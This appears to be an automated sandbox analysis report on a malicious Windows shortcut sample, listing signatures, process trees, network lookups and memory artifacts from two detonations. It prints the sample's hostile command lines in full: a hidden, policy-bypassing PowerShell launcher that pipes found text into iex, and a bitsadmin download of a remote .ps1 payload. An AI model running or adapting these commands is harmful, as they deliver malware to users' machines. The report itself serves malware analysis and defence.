Malware Analysis Report

2025-04-14 03:26

Sample ID: 240612-sj1spstbrl
Target: a11a90303a1542f465542239afc4ea60_JaffaCakes118
SHA256: 8d7de3083012dd352a020eee216a6acdf08aed1a1f69cce481f7353274e4c82c
Tags: execution
Score: 8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 8/10

SHA256: 8d7de3083012dd352a020eee216a6acdf08aed1a1f69cce481f7353274e4c82c

Threat Level: Likely malicious

The file a11a90303a1542f465542239afc4ea60_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Enumerates physical storage devices

Download via BitsAdmin

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-12 15:10

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-12 15:10

Reported: 2024-06-12 15:12

Platform: win10v2004-20240508-en

Max time kernel: 147s

Max time network: 150s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text

C:\Windows\system32\findstr.exe

"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1 & del C:\Users\Admin\AppData\Roaming\\d & exit

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\\vWjXOBtIxaArTN.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 internetmarketing4pros.com udp
US 8.8.8.8:53 internetmarketing4pros.com udp

Files

memory/664-2-0x00007FF84DBE3000-0x00007FF84DBE5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlcftper.bt5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/664-12-0x00000285713C0000-0x00000285713E2000-memory.dmp

memory/664-13-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-14-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-25-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

memory/664-26-0x00007FF84DBE0000-0x00007FF84E6A1000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-12 15:10

Reported: 2024-06-12 15:12

Platform: win7-20240221-en

Max time kernel: 119s

Max time network: 119s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2152 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2612 wrote to memory of 2792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2476 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\findstr.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2792 wrote to memory of 2988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe
PID 2988 wrote to memory of 2780 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bitsadmin.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\a11a90303a1542f465542239afc4ea60_JaffaCakes118.lnk

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -eP ByPass -nonI -c "&{powershell -wi"N "hi"dDen -c {$b7oc=findstr /s mrildkpased c:\users\*.lnk; "$b7oc" | iex}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -wiN hidDen -encodedCommand JABiADcAbwBjAD0AZgBpAG4AZABzAHQAcgAgAC8AcwAgAG0AcgBpAGwAZABrAHAAYQBzAGUAZAAgAGMAOgBcAHUAcwBlAHIAcwBcACoALgBsAG4AawA7ACAAJABiADcAbwBjACAAfAAgAGkAZQB4AA== -inputFormat xml -outputFormat text

C:\Windows\system32\findstr.exe

"C:\Windows\system32\findstr.exe" /s mrildkpased c:\users\*.lnk

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C echo 1 > C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1 & del C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\d & exit

C:\Windows\system32\bitsadmin.exe

bitsadmin /transfer mrildkpased /download /priority FOREGROUND "https://internetmarketing4pros.com/marco/pro" C:\Users\Admin\AppData\Roaming\00000000-0000-0000-0000-000000000000\AxHMdTVikEOCgb.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 internetmarketing4pros.com udp

Files

memory/2612-38-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp

memory/2612-39-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/2612-41-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-42-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-43-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-40-0x0000000001F30000-0x0000000001F38000-memory.dmp

memory/2612-44-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-45-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-51-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

memory/2612-52-0x000007FEF55BE000-0x000007FEF55BF000-memory.dmp